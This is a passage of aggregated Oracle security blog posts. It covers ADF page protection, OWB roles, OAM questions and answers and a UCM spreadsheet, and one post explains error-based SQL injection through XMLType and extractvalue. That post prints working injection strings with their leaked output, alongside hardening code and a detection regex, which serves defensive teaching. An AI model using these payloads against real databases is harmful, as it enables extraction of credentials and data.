Blocking Tools from using the database

I saw Charles Hooper's post titled "Why Doesn't This Trigger Work - No Developer Tools Allowed in the Database" via my Oracle blogs aggregator and read it with interest, as it's related to issues I come across....[Read More]

Posted by Pete On 10/03/10 At 11:08 AM

PeopleSoft Viewlets

Viewlets are now available for a variety of PeopleTools topics. They are posted on oracle.com. See the banner topic on the PeopleTools page:
http://www.oracle.com/applications/peoplesoft/tools_tech/ent/ptools/index.html

Or go directly here: http://download.oracle.com/peopletools/viewlets.html

These are published on the publicly accessible oracle.com site.

Pete Finnigan Webinar on Oracle Security

It has been quite a while since my last blog post; I keep promising to post more often and, even worse, I have a long list of things to blog about, but I don't seem to get enough time recently....[Read More]

Posted by Pete On 08/03/10 At 04:04 PM

How-to protect your ADF pages

A great discussion on the JDeveloper forum on OTN brought a new addition to ADF application security that I'd like to share.

Chapter 30 of the Oracle® Fusion Middleware Fusion Developer's Guide for Oracle Application Development Framework 11g Release 1 explains the JAAS protection mechanism for ADF pages and task flows. It recommends reducing the number of JSF pages in the adfc-config.xml file to the absolute minimum and granting ADF Security permissions only to those documents that need to be accessible from a browser request.

All other pages should be located in bounded task flows, which you can protect declaratively against GET requests such as those issued from a browser URL. Bounded task flows need to be granted to users through application roles to be accessible.

The discussion on OTN is about protecting the physical JSPX files. If you are an authenticated and authorized user, you can access a JSPX page directly, e.g. by calling localhost:7101/myapp/faces/Departments.jspx. This serves the page, though it may not be fully functional because it is not launched within the controller context.

The recommendation therefore is to store JSPX documents under the WEB-INF directory of the public_html folder. This solves the problem of users accessing physical files directly.

Frank

PS: Note that if moving JSPX documents into the WEB-INF folder is not an option for you, you can write a servlet filter that checks the incoming request URL for the resource it accesses. If a JSPX file is accessed, return an HTTP 403 error.
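As an added illustration of the servlet-filter alternative (this is example code written for this page, not Frank's or Oracle's), the filter below answers direct requests for selected JSPX documents with HTTP 403. It deliberately does not block every .jspx request: the pages listed in adfc-config.xml are the ones a browser is meant to request, so only the pages that belong inside bounded task flows should be denied. Those paths are assumed to arrive through a hypothetical init-param named protectedPages in web.xml, and the filter is assumed to be mapped to /*. The check is made on the container-decoded servlet path rather than the raw URL so that case differences, doubled slashes and ;jsessionid path parameters do not slip past it.

```java
import java.io.IOException;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Added example, not the original post's code. Returns HTTP 403 for direct
 * requests to JSPX documents that should only be reached through a bounded
 * task flow. The page list is an assumption: it comes from a hypothetical
 * init-param "protectedPages" in web.xml, for example
 *   /faces/Departments.jspx,/faces/Employees.jspx
 * Pages registered in adfc-config.xml (the ones a browser may legitimately
 * request) must not appear in that list.
 */
public class JspxDirectAccessFilter implements Filter {

    private final Set<String> protectedPages = new HashSet<String>();

    @Override
    public void init(FilterConfig config) throws ServletException {
        String list = config.getInitParameter("protectedPages");
        if (list != null) {
            for (String entry : list.split(",")) {
                String path = normalize(entry);
                if (path.endsWith(".jspx")) {
                    protectedPages.add(path);
                }
            }
        }
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        if (isProtected(requestedPath(request))) {
            // Stop here: no rendering and no redirect that would leak the page.
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }
        chain.doFilter(req, res);
    }

    @Override
    public void destroy() {
        protectedPages.clear();
    }

    /**
     * Path inside the web application, without context root or query string.
     * servletPath and pathInfo are already URL-decoded by the container and
     * have path parameters such as ;jsessionid=... removed.
     */
    static String requestedPath(HttpServletRequest request) {
        String servletPath = request.getServletPath();
        String pathInfo = request.getPathInfo();
        return normalize((servletPath == null ? "" : servletPath)
                + (pathInfo == null ? "" : pathInfo));
    }

    boolean isProtected(String path) {
        return protectedPages.contains(path);
    }

    /** Lower-case and collapse repeated slashes so /faces//Departments.JSPX
     *  compares equal to /faces/departments.jspx. */
    static String normalize(String path) {
        String p = path.trim().toLowerCase(Locale.ROOT).replaceAll("/{2,}", "/");
        return p.startsWith("/") ? p : "/" + p;
    }
}
```

Register it in web.xml ahead of the ADF filters with a url-pattern of /*; a 403 from this filter is reached before the Faces servlet, so the page is never compiled or rendered for the blocked request.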

Build up multi-role development environment in OWB

Oracle Warehouse Builder enables multiple users to work on the same repository throughout the lifecycle of warehouse development. In a well-organized team these users are usually grouped by role: some are in charge of developing ETL metadata; others are responsible for testing those objects (mappings, process flows, and so on) and making sure they are correct. In this article I'd like to provide a simple example of building a multi-role development environment in OWB using OWB Security.

OWB Security lets us define security on the objects stored in the repository (object privileges) and control access to system-level services (system privileges). With OWB Security we can define multiple users and roles and apply a different security strategy to each. I will implement a two-role environment using OWB Security: DEVELOPER, who develops ETL objects, and QA, who tests the developed objects and verifies their correctness. I will also create users with the DEVELOPER or QA role. Then we will see how we benefit from this two-role environment during warehouse development.

1. Set up a new workspace

Let's start by creating a new workspace. A workspace is where all ETL objects live. In OWB 11.2, workspaces are stored in a single schema and it is simple to create one using the Repository Assistant.

Here I create a workspace named "wksp1" with user "admin" as its owner. Note that the workspace owner is the superuser of the workspace, much like root on Linux. We will proceed with the subsequent steps using this account.

2. Revoke all privileges from EVERYONE role

With the workspace prepared, we can log into the Design Client as the workspace owner "admin". Before creating any role or user, we should do one thing immediately: revoke all privileges from the EVERYONE role.

OWB automatically creates two predefined roles for each workspace: ADMINISTRATOR and EVERYONE. ADMINISTRATOR holds all object privileges and system privileges in the workspace. The workspace owner ("admin" in our case) is granted the ADMINISTRATOR role by default. EVERYONE is granted to every workspace user by default and cannot be revoked from any user.

The EVERYONE role has many default system privileges and object privileges. Because each OWB user is granted EVERYONE by default, every user also inherits its privileges. Since we will create users whose security strategy is inherited from our own roles, we don't want it affected by the EVERYONE role. So we should deselect all privileges from EVERYONE immediately after logging into the new workspace. Here is what to do:

  • Edit role EVERYONE and deselect all system privileges from the role.

  • Edit user ADMIN and revoke all object privileges from role EVERYONE, so that EVERYONE has no privileges on objects created by user ADMIN. Note that this must be repeated each time a new user is created.

3. Define roles inside workspace

Now we can start defining roles inside the workspace. But first, let me cover the basic concepts of default object privileges and system privileges.

Default object privileges define the access that other users and roles have to the objects the selected user creates. OWB defines the following object privileges: FULL_CONTROL, EDIT, COMPILE and READ. They are additive, which means that selecting COMPILE grants both COMPILE and READ. Note that FULL_CONTROL means EDIT plus the ability to grant and revoke privileges on an object.

System privileges define a user's access to workspace-wide services. For example, CREATE_PROJECT allows a user to create projects, while CONTROL_CENTER_DEPLOYMENT allows a user to deploy to the Control Center and then run those procedures.

For more details on object privileges and system privileges, please refer to the OWB Installation and Administration Guide.

In our case we define two roles: DEVELOPER, responsible for developing all ETL objects inside the workspace, and QA, responsible for testing the ETL objects created by the developer.

DEVELOPER should be able to create and edit projects and all ETL objects under them, and to deploy and execute them in the Control Center. But developers do not need to grant and revoke privileges of other users and roles, view created objects in the browser, and so on. So we grant EDIT as the default object privilege, and all system privileges except ACCESS_PUBLICVIEW_BROWSER.

QA should NOT be able to create or edit ETL objects inside the workspace, but should be able to compile, deploy and execute the ETL objects in order to test them. So we grant COMPILE as its default object privilege, and grant it all Control Center system privileges.

Here we create the new roles DEVELOPER and QA and grant system privileges to them. We will set default object privileges later, when we create users.

4. Create users and grant them with different roles

With the roles defined, we can create users and grant them the proper role. Remember that we should also set default object privileges after creating users.

First let's create user DEV1 with role DEVELOPER, and user QA1 with role QA.

Then we grant default object privileges to roles DEVELOPER and QA for users DEV1 and QA1. Pay attention: we must also revoke all privileges from role EVERYONE! (See the preceding section, Revoke all privileges from EVERYONE role.)

For DEV1, we allow users with role DEVELOPER to EDIT all objects it creates, and only allow users with role QA to COMPILE them.

The settings for user QA1 look somewhat strange: we revoke all default object privileges from all roles! Remember that QA cannot create or edit ETL objects inside the workspace? It is safe to revoke all default object privileges for all roles, as QA1 will never create any objects.

This raises another question: how do we guarantee that QA1 cannot create ANY objects inside the workspace? The answer is as follows.

  • User QA1 cannot edit objects created by DEV1, and OWB guarantees that the same default privileges pass down to child objects. Since QA1 cannot edit a project created by DEV1, it cannot create any new objects under those projects.
  • We revoked the system privilege CREATE_PROJECT from role QA (remember?), so QA1 cannot create its own project or any objects under it.
  • There is also a predefined project MY_PROJECT; we can revoke all privileges for role EVERYONE from its Security panel (select "View -> Security" to open the panel). Now user QA1 cannot create any objects under MY_PROJECT either.

5. Verify the final result and enjoy our multi-role workspace

Now we are done with all settings for workspace "wksp1" and can proceed with our warehouse development tasks on it. Let's check it out.

First let's log into the workspace as user DEV1; we are able to start ETL development. We can create a new project and Oracle module, import tables, create a mapping, and deploy and execute the mapping we created.

Then let's log into the workspace as user QA1.

If we double-click to open mapping MAP_SRC_TO_TGT created by user DEV1, a warning pops up saying that we can only open the object in read-only mode.

Meanwhile we are able to compile and deploy the same mapping as user QA1. That's what we want for QA.

And if we try to create a new mapping under the same Oracle module ORA_TARGET, it warns us that we are not allowed to do so, which is also what we wanted in this case!

In summary, this article illustrates a simple example of building a multi-role development environment in OWB. We hope you find it helpful in building your own environment, possibly with more complex roles and users.

sec_return_server_release_banner Secure by Default?

Hello World, Congratulations to Sentrigo for being nominated again in the SC Awards in the US for Hedgehog. http://www.scmagazineus.com/scawards2010-finalists/section/1309/ Just came across an ex-colleague from Pentest Ltd named Simon Fletcher who has started a blog on Oracle Security. http://blog.fifteentwentyone.co.uk/2010/02/sql92security.html Nice post and good luck with the new blog. Oracle config issues like these are interesting for already very highly secured [...]

Oracle TNS Resend Packet

As you can see here, the Python code handles a specific case of Oracle TNS layer requesting a RESEND of the last packet. I’ve noticed that no matter what client I’m trying to connect with, Oracle is always requesting a RESEND after the initial CONNECT request as you can see here (removed various ACK packets, [...]

SC Magazine awards dinner

We had a great time at the SC magazine awards dinner on Tuesday. We were finalists in the “best SME security solution” category but unfortunately we did not win. Here is Andy, our VP marketing before the dinner and announcements: And here he is after some wine and us not winning:

RSA Conference 2010 – Linux WIFI users

So, I arrived to Moscone Center a bit late for the first cloud security alliance session. It turns out that there was a huge line to enter and a lot of people were left outside. Having a free 1.5 hours, I wanted to connect and check emails. I’ve already received my password so I thought it [...]

E-Business Suite Security and DBMS_LDAP.INIT

Hi Folks, Vulnerability in E-Business Suite R12 requires non-default diagnostics mode so Low risk. http://www.securityfocus.com/archive/1/509460 Having said that it is worth keeping an eye on Internet facing Oracle applications, though there is not a huge amount on this from O’Reilly and Apress. Google books has a relevant book free of charge named “Security, Audit and Control Features Oracle E-Business [...]

It’s been a while…

It's been a while since I wrote my last blog entry. Actually, it's been a really long while. In the interim, I've since sold NGSSoftware and after staying on for 16 months have now resigned and am taking a wee break, but planning my next venture - V3rity. All will be revealed. Soon.

Posted by David On 26/02/10 At 03:34 PM

Enumerate Oracle SIDs

As promised, here is a small Python script to allow you to enumerate and find Oracle SIDs. Of course, the usual caveats apply – if it breaks something, I’m not responsible. Use at your own risk. I’m using the sidlist.txt file from David’s OAK but there are plenty of available resources with common SID [...]

Managing UCM users en masse

One of the handiest tools that I use with UCM is the Mass Metadata Update Excel spreadsheet. It lets you run searches against UCM and update content metadata in an Excel spreadsheet through web services. It was first created by Bex and then later enhanced by Jason Stortz.

For demonstration purposes, it's a great way to show how open and easy it is to do integrations with UCM. Just a few lines of VB script in an Excel macro and you've got an incredibly useful client tool.

Thinking about other tasks you may need to do in bulk in UCM besides dealing with content, managing users comes to mind. Even with external user stores, user information is captured and stored in UCM. So one of the first things I did with the spreadsheet was to modify it to add and delete users. Then I made further changes to be able to get a list of the users and to edit them.

Someone recently asked me the best way to mass delete users that had been cached there from their old LDAP schema. The User Admin applet doesn't let you multi-select, so that becomes a very slow process. One alternative is to get the DBA involved and deal with the data directly in the database tables, which isn't ideal either.

But with this spreadsheet, you can quickly add, edit, or delete the users in the system. When you open this in Excel, be sure you have your security set to allow macros.


When you first try to execute one of the commands, it will prompt you for your administrator username and password. Be warned though...once you click the confirmation dialog, it is set to perform that action. I'd recommend backing up the system before making any large-scale changes.

All of the code is right in the macros and can easily be modified to change the behavior such as adding more user metadata fields or filtering on certain user types.

You can download a copy of the spreadsheet here. This should be treated just like a sample component which is provided as-is with no support or warranties.

2 new ways to create error messages

Today I came across a nice blog article, “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” by Dmitry Evteev, about new techniques that can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the post is not correct for Oracle (it’s not blind SQL injection, it’s error-based, which is a small but important difference), the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.

Using error messages of XMLType:

XMLType allows creating error messages that contain custom strings (like database users, passwords, …). The string must start with '<:', which is why we concatenate '<:' to the string. Additionally, all spaces and at-signs must be replaced.

SQL> select XMLType(('<:'||user||'>')) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName ":SYS" (not a Name)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 0
ORA-06512: at line 1

SQL> select XMLType(('<:'||replace((select banner from v$version where rownum=1),' ','')||'>')) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName ":Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production" (not a Name)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 0
ORA-06512: at line 1

This can be used in an SQL Injection statement:

or 1=length(XMLType(('<:'||replace((select banner from v$version where rownum=1),' ','')||'>')))--

The second technique is mentioned in the comments: 

SQL> select extractvalue(xmltype('<x/>'),'/$'||(SELECT banner FROM v$version where rownum=1)) from dual;

*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: '/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product

This can be used in an SQL Injection statement:

or 1=length(extractvalue(xmltype('<x/>'),'/$'||(SELECT banner FROM v$version where rownum=1)))--
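Both techniques depend on two things an application can deny them: a query that splices user input into SQL text, and a response that echoes the ORA-/LPX- error text back to the client. The following added example (written for this page; it is not the original post's code and not Oracle's) shows the JDBC sink these payloads need next to its parameterised replacement, an error handler that keeps database messages out of the response, and a small fingerprint check for request parameters. It assumes a hypothetical table DEPARTMENTS(DEPT_ID NUMBER, DEPT_NAME VARCHAR2) and a JDBC Connection supplied by the caller.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.logging.Logger;
import java.util.regex.Pattern;

/**
 * Added example, not code from the original post. Assumes a hypothetical
 * DEPARTMENTS(DEPT_ID NUMBER, DEPT_NAME VARCHAR2) table.
 */
public final class DeptLookup {

    /**
     * Vulnerable form: the caller-controlled id becomes part of the SQL text.
     * A value such as  1 or 1=length(XMLType(...))--  is therefore executed
     * as SQL, and the ORA-19202/LPX-00110 message carries the data out.
     */
    public static String findNameUnsafe(Connection con, String deptId) throws SQLException {
        String sql = "select dept_name from departments where dept_id = " + deptId;
        try (Statement st = con.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getString(1) : null;
        }
    }

    /**
     * Hardened form: the id is validated as a number and bound as a
     * parameter. Whatever the string contains, it is never parsed as SQL,
     * and a non-numeric value is rejected before the database is reached.
     */
    public static String findName(Connection con, String deptId) throws SQLException {
        long id;
        try {
            id = Long.parseLong(deptId.trim());
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("dept_id must be numeric");
        }
        String sql = "select dept_name from departments where dept_id = ?";
        try (PreparedStatement ps = con.prepareStatement(sql)) {
            ps.setLong(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    /**
     * Error-based extraction only works when the database error text reaches
     * the client. Keep the ORA-/LPX- detail in the server log and return a
     * fixed, opaque message to the browser.
     */
    public static String toClientMessage(SQLException e, Logger log) {
        log.warning("database error " + e.getErrorCode() + ": " + e.getMessage());
        return "The request could not be processed.";
    }

    // Fingerprint of the two functions used by the techniques above, as they
    // would appear inside a request parameter. Constructed for this example.
    private static final Pattern ERROR_BASED_PROBE =
            Pattern.compile("(?i)\\b(xmltype|extractvalue)\\s*\\(");

    /** For a WAF rule or access-log review: true when a parameter value
     *  carries the XMLType/extractvalue fingerprint. */
    public static boolean looksLikeErrorBasedProbe(String param) {
        return param != null && ERROR_BASED_PROBE.matcher(param).find();
    }
}
```

The bound parameter is the fix; the generic error message and the fingerprint check are defence in depth, since an ORA-19202 that is logged but never rendered gives the technique nothing to read.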

Oracle Access Manager Questions & Answers

Hi all,

Here I am going to post OAM questions and answers.

Oracle Access Manager is a state-of-the-art solution for both centralized identity management and access control, providing an integrated standards-based solution that delivers authentication, web single sign-on, access policy creation and enforcement, user self-registration and self-service, delegated administration, reporting, and auditing.    

Q: What is Single Sign On?
A: Single Sign-On allows users to sign on once to a protected application and gain access to the other protected resources within the same domain that are defined with the same authentication level.

Q: What is multi domain Single Sign-On?
A: Multi-domain SSO gives users the ability to access more than one protected resource (URLs and applications) scattered across multiple domains with a single authentication.

Q: What is the authentication mechanism used by Oracle Access Manager?
A: The ObSSOCookie, which is stateless.

Q: Explain various security modes present in Oracle Access Manager?
A:
Open: Allows unencrypted communication. In Open mode there is no authentication or encryption between the AccessGate and the Access Server. The AccessGate does not ask for proof of the Access Server’s identity, and the Access Server accepts connections from all AccessGates. Similarly, the Identity Server does not require proof of identity from WebPass.
Simple: Supports encryption by Oracle. In Simple mode, communications between Web clients (WebPass and Identity Server, Policy Manager and WebPass, and Access Server and WebGate) are encrypted using TLS v1. In both Simple and Cert mode, Oracle Access Manager components use X.509 digital certificates only. This includes Cert Authentication between WebGates and the Access Server, where the standard cert-decode plug-in decodes the certificate and passes certificate information to the standard credential_mapping authentication plug-in. For each public key there exists a corresponding private key that Oracle Access Manager stores in the aaa_key.pem file for the Access Server (or ois_key.pem for the Identity Server).
Cert: Requires a third-party certificate. Use Cert (SSL) mode if you have an internal Certificate Authority (CA) for processing server certificates. In Cert mode, communication between WebGate and Access Server, and between Identity Server and WebPass, is encrypted using Transport Layer Security, RFC 2246 (TLS v1).

Q: Explain the architecture of Oracle Access Manager?
A: The Oracle Access Manager architecture mainly consists of the following components: Identity Server, WebPass, Policy Manager, Access Server and WebGate. The Identity Server is a standalone C++ server that communicates directly with LDAP.
It also receives requests from and sends responses to WebPass. WebPass is a web server plugin that passes information between the Identity Server and the web server. It redirects HTTP requests from the browser to the Access Server, and sends IdentityXML SOAP requests to the Identity Server.
Policy Manager (PMP or PAP) is a web server plugin that communicates directly with the user, configuration and policy repositories. Access Server is a standalone C++ server, also called the PDP. It receives requests from and sends responses to WebGates/AccessGates.
It also communicates with LDAP and answers Access Server SDK requests. WebGate (PEP) is a web server plugin that passes information between the web server and the Access Server. It passes user authentication data to the Access Server for processing.

Q: What are the ObSSOCookie Contents?
A: The cookie contains an encrypted session token and unencrypted data.
The encrypted session token consists of: the DN of the authenticated user, the level of the authentication scheme, the IP address of the client to which the cookie was issued, the time the cookie was issued, and the time the cookie was last updated. If the user is not idle, the cookie is automatically updated at a fixed interval to prevent session timeout. The update interval is 1/4 of the idle session timeout of the AccessGate.
The unencrypted ObSSOCookie data contains the cookie expiry time, the domain in which the cookie is valid, and a flag that determines whether the cookie can only be sent over SSL.

Q: What is the key used for encrypting the ObSSOCookie?
A: The shared secret key. It is configured in the Identity Admin console and can be generated by the OAM administrator.

Q: What happens if the ObSSOCookie is tampered?
A: When the Access System generates the ObSSOCookie, an MD5 hash is taken of the session token. So when the user is authenticated again using the cookie, the MD5 hash is compared with the original cookie contents. MD5 is a one-way hash, hence it cannot be decrypted. The Access Server compares the cookie contents with the hash. If they are not the same, the cookie was tampered with in the interim. This cookie does not contain the username and password.

Q: What is the difference between WebGate and AccessGate?
A: WebGate is an out-of-the-box plug-in that intercepts Web resource (HTTP) requests and forwards them to the Access Server for authentication and authorization. An AccessGate is a custom WebGate that can intercept requests for both HTTP and non-HTTP resources.
 
Q: What are the major parameters defined in an authentication scheme?
A: The authentication scheme level, which defines the level of security defined for an application.

Q: Explain the flow when a user requests for an application protected by Oracle Access Manager?
A: The following steps describe the flow when a user makes a request to access a resource protected by Oracle Access Manager.

  • The user requests a resource through a web browser.
  • The WebGate intercepts the request and checks with the Access Server whether the resource is protected.
  • If the resource is not protected, the user is shown the requested resource.
  • If the resource is protected, the Access Server checks with the Policy Manager for the authentication scheme configured for that resource.
  • The user is prompted to enter credentials as per the authentication scheme defined for the resource.
  • The WebGate sends the credentials to the Access Server to check them against the backend (LDAP server).
  • Upon successful authentication, the Access Server checks whether the user is authorized to access the resource.
  • If the user is authorized, the Access Server creates the session ID and passes it to the WebGate. An ObSSOCookie is created and sent to the user’s browser, and the user is shown the requested resource.
  • If the user is not authorized, an error page (if one is defined in the policy domain) is shown to the user.

Q: Explain the flow of a Multi domain Single Sign-On?
A: Multi-domain SSO gives users the ability to access more than one protected resource (URLs and applications) scattered across multiple domains with a single authentication.

  • For multi-domain SSO to work, the Access Servers in all domains must use the same policy directory.
  • Multi-domain SSO works only with WebGates, not AccessGates.
  • Within each individual domain, each WebGate must have the same “primary HTTP cookie domain”.

In a multi-domain SSO environment, we designate one web server (where a WebGate is installed) as the “Primary Authentication Server”. The Primary Authentication Server acts as the central server for all authentications in the multi-domain environment. In general, the WebGate installed in the domain where the Access Server resides is designated as the primary authentication server.

Let’s assume that the OAM components are installed on host1.domain1.com and we designate host1.domain1.com as the primary authentication server.
* host2.domain2.com has a WebGate (e.g. webgate2) installed.
* A resource, abc.html, is protected with Form-based authentication on host1.mydomain1.com.
* A resource, xyz.html, is protected with Basic over LDAP authentication on host2.mydomain2.com.

The following steps explain how multi-domain SSO works:
1. The user initiates a request for a web page from a browser. For instance, the request could be for host2.domain2.com/xyz.html.
2. Webgate2 (on host2.domain2.com) sends the authentication request back through the user’s browser in search of the primary authentication server. In this example you have designated host1.domain1.com as the primary authentication server.
3. The request for authentication is sent from the user’s browser to the primary authentication server, host1.domain1.com. This request flows to the Access Server. The user logs in with the corresponding authentication scheme and the ObSSOCookie is set for host1.domain1.com. The Access Server also generates a session token with a URL that contains the ObSSOCookie.
4. The session token and ObSSOCookie are returned to the user’s browser.
5. The session token and ObSSOCookie are sent to host2.domain2.com.
6. The WebGate (webgate2) on host2.domain2.com sets the ObSSOCookie for its own domain (.domain2.com) and satisfies the user’s original request for the resource host2.domain2.com/xyz.html. The user gets the resource.
7. If the user then accesses a host1.domain1.com page in the same browser, the resource is presented without asking for credentials, as the ObSSOCookie is already available for .domain1.com (see step 3).

Q: What is an Access Server SDK?
A: The Access Manager Software Developer’s Kit (SDK) enables you to enhance the access management capabilities of the Access System. This SDK enables you to create a specialized AccessGate. The Access Manager SDK creates an environment for you to build a dynamic link library or a shared object to perform as an AccessGate. You also need the configureAccessGate.exe tool to verify that your client works correctly.

Q: What is an Identity XML?
A: IdentityXML provides a programmatic interface for carrying out the actions that a user can perform when accessing a COREid application from a browser. For instance, a program can send an IdentityXML request to find members of a group defined in the Group Manager application, or to add a user to the User Manager.

IdentityXML enables you to process simple actions and multi-step workflows to change user, group, and organization object profiles.
After creating the IdentityXML request, you construct a SOAP wrapper to send the IdentityXML request to WebPass over HTTP. The IdentityXML API uses XML over SOAP. We pass IdentityXML parameters to the COREid Server using an HTTP request. This HTTP request contains a SOAP envelope. When WebPass receives the HTTP request, the SOAP envelope indicates that it is an IdentityXML request rather than the usual browser request.
The request is forwarded to the COREid Server, where the request is carried out and a response is returned. Alternatively, you can use WSDL to construct the SOAP request. The SOAP content looks like this, SOAP envelope (with oblix namespace defined), SOAP body (with authentication details), actual request (with application name and params). The application name can be userservcenter, groupservcenter or objservcenter (for organizations).

Q: What is an SSPI connector and its role in Oracle Access Manager integrations?
A:  The Security Provider for WebLogic SSPI (Security Provider) ensures that only appropriate users and groups can access Oracle Access Manager-protected WebLogic resources to perform specific operations. The Security Provider also enables you to configure single sign-on between Oracle Access Manager and WebLogic resources.
The WebLogic security framework provides Security Service Provider Interfaces (SSPIs) to protect J2EE applications. The Security Provider takes advantage of these SSPIs, enabling you to use Oracle Access Manager to protect WebLogic resources via:

  • User authentication
  • User authorization
  • Role mapping

The Security Provider consists of several individual providers, each of which enables a specific Oracle Access Manager function for WebLogic users:
Authenticator: This security provider uses Oracle Access Manager authentication services to authenticate users who access WebLogic applications. Users are authenticated based on their credentials, such as user name and password.
The security provider also offers user and group management functions. It enables the creation and deletion of users and groups from the BEA WebLogic Server. It also provides single sign-on between WebGates and portals.
Identity Asserter: Like the Authenticator, this security provider uses Oracle Access Manager authentication services to validate already-authenticated Oracle Access Manager users using the ObSSOCookie and to create a WebLogic-authenticated session.
Authorizer: This security provider uses Oracle Access Manager authorization services to authorize users who are accessing a protected resource. The authorization is based on Oracle Access Manager policies.
Role Mapper: This security provider returns security roles for a user. These roles are defined in Oracle Access Manager, and they are provided by Oracle Access Manager using return actions on a special authentication policy. This authentication policy contains a resource with a URL prefix of /Authen/Roles. Role Mapper maps these roles to predefined security roles in WebLogic.

Q: Explain the integration and architecture of OAM-OAAM integration?
A: Using these products in combination gives you fine control over the authentication process and the full capabilities of pre- and post-authentication checking against Adaptive Risk Manager models.
The OAAM ASA-OAM integration involves two Oracle Access Manager AccessGates: one fronting the web server (a traditional WebGate) for the Adaptive Strong Authenticator, and one embedded AccessGate. The Access Server SDK must be installed and the configureAccessGate tool run. The ASA bharosa files must be updated with the ASDK location. An application must be protected using the ASA authentication scheme and tested for the ASA landing page at login.

Here is how the flow goes:
1. The user requests a resource.
2. The WebGate acting as the front end for the ASA application intercepts the request and redirects to the ASA application.
3. The user enters credentials, and the Access SDK set up in the ASA application contacts the AccessGate, which in turn contacts the Access Server to validate the credentials.
4. Upon successful authentication, the Access Server generates the ObSSOCookie and forwards it to the browser.
5. The user is then shown the requested resource.

Q: Explain IWA mechanism in Oracle Access manager?
A: OAM has a feature that enables Microsoft Internet Explorer users to authenticate automatically to their web applications using their desktop credentials. This is known as Windows Native Authentication.

  1. The user logs in to the desktop machine, and local authentication is completed using the Windows Domain Administrator authentication scheme.
  2. The user opens an Internet Explorer (IE) browser and requests an Access System-protected web resource.
  3. The browser notes the local authentication and sends a token to the IIS web server.
  4. The IIS web server uses the token to authenticate the user and sets up the REMOTE_USER HTTP header variable, which specifies the user name supplied by the client and authenticated by the server.
  5. The WebGate installed on the IIS web server uses the hidden feature of external authentication to get the REMOTE_USER header variable value and map it to a DN for ObSSOCookie generation and authorization.
  6. The WebGate creates an ObSSOCookie and sends it back to the browser.
  7. Access System authorization and other processes proceed as usual.
  The maximum session timeout period configured for the WebGate applies to the generated ObSSOCookie.

Q: Explain the major parameters defined in a WebGate instance profile?
A:

  • Hostname: Name of the machine hosting the AccessGate.
  • Maximum User Session Time: Maximum amount of time in seconds that a user’s authentication session is valid, regardless of their activity. At the expiration of this session time, the user is re-challenged for authentication. This is a forced logout. Default = 3600. A value of 0 disables this timeout setting.
  • Idle Session Time (seconds): Amount of time in seconds that a user’s authentication session remains valid without accessing any AccessGate protected resources.
  • Maximum Connections: Maximum number of connections this AccessGate can establish. This parameter is based on how many Access Server connections are defined to each individual Access Server. This number may be greater than the number allocated at any given time.
  • IPValidationException: IPValidationException is specific to WebGates. This is a list of IP addresses that are excluded from IP address validation. It is often used for excluding IP addresses that are set by proxies.
  • Maximum Client Session Time: How long a connection from the AccessGate to the Access Server is maintained. If you are deploying a firewall (or another device) between the AccessGate and the Access Server, this value should be smaller than the timeout setting for the firewall.
  • Failover Threshold: Number representing the point at which this AccessGate opens connections to secondary Access Servers. If you type 30 in this field and the number of connections to primary Access Servers falls to 29, this AccessGate opens connections to secondary Access Servers.
  • Preferred HTTP Host: Defines how the host name appears in all HTTP requests as they attempt to access the protected Web server. The host name in the HTTP request is translated into the value entered in this field regardless of how it was defined in the user's HTTP request.
  • Primary HTTP Cookie Domain: This parameter describes the Web server domain on which the AccessGate is deployed, for instance, .mycompany.com.
  • IPValidation: IP address validation is specific to WebGates and is used to determine whether a client’s IP address is the same as the IP address stored in the ObSSOCookie generated for single sign-on.
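The session parameters above interact: the two timeouts are checked first (a value of 0 disables one), and IPValidation only binds the cookie to the client address when the requesting address is not on the IPValidationException list. The following is an added illustration, not WebGate's own code; the profile values, addresses and timestamps are constructed.

```java
import java.time.Instant;
import java.util.Set;

/** Models how a WebGate profile's session parameters decide whether an ObSSOCookie is still usable. */
public class WebGateSessionCheck {

    // Constructed profile values mirroring the parameters described above
    static final int MAX_USER_SESSION_TIME = 3600;   // seconds; 0 disables the forced logout
    static final int IDLE_SESSION_TIME     = 900;    // seconds; 0 disables the idle timeout
    static final boolean IP_VALIDATION     = true;
    // IPValidationException: proxy addresses exempt from the IP check (constructed)
    static final Set<String> IP_VALIDATION_EXCEPTION = Set.of("10.0.0.5");

    enum Verdict { VALID, EXPIRED_MAX_SESSION, EXPIRED_IDLE, IP_MISMATCH }

    /**
     * authenticatedAt: when the cookie was issued; lastAccessAt: last protected-resource access;
     * cookieIp: address stored in the ObSSOCookie; clientIp: address of the current request.
     */
    static Verdict check(Instant authenticatedAt, Instant lastAccessAt,
                         String cookieIp, String clientIp, Instant now) {
        long sinceAuth = now.getEpochSecond() - authenticatedAt.getEpochSecond();
        long sinceLast = now.getEpochSecond() - lastAccessAt.getEpochSecond();

        // Maximum User Session Time: forced re-authentication regardless of activity
        if (MAX_USER_SESSION_TIME > 0 && sinceAuth >= MAX_USER_SESSION_TIME) {
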